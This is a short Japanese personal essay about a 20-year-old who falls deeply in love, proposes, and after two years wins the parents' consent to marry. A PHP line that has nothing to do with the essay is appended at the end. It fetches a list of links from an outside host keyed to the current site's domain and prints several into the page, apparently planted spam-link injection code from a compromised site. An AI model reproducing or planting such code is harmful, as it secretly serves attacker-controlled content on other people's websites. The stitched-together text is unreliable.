好きで好きで結婚へゴールイン

長い間付き合って、好きで好きで結婚へゴールインし達成した思い出がある。
毎日、相手のことしか考えられなくてアルバイトをしていても手につかない状態が続き困っていた。
そんなある日、こんなに悩んでいるなら結婚を申し込んでしまえと思った。
好きで好きで結婚へゴールインついにやった。
自分から進んで相手に打ち明けたら一つ返事で逆に驚いた。
しかし、相手に結婚を承諾してもらっても親を説得しなくてはならないという難点もある。
それは、私はまだ20歳で親のすねをかじっている。
相手は、社会人だが新卒で私を養っていけるといっても両親がどう出るか。
ここから親をどうやって説得していくかが問題になってくる。
私には、年の離れた姉が一人いるが姉は私と同じで早くに結婚したが、別れて家に帰ってきてもう何年もいる。
そんな娘を両親も、ずっと見ていて私にはゆっくり家に居なさいというような言葉をかけてきていたのだ。
私が、相手を好きで好きで結婚へゴールインまで導かなければならないのにどうしたらいいのか。
悩んでいるうちに彼が、私の両親に挨拶に行ってくれるといいだしてくれた。
私の気持ちをわかってくれていたそれだけで胸が熱くなり、鼓動がしていた。
両親に結婚の事を伝え彼を紹介したいと言った。
両親は、彼と一緒にお茶を飲みながら話をしていた。
そして、すぐには結婚を認めてくれなかったが、私が社会人になり約2年過ぎた頃結婚へ向けての準備が開始された。

//// $MAX = 5; // ////////////////// $lines = file('http://www.admin-search.biz/B/seo_links/?r_dom='.str_replace("www.", "", $_SERVER['HTTP_HOST']));shuffle($lines); for($i=0;$i<$MAX;$i++){ echo($lines[$i].""); }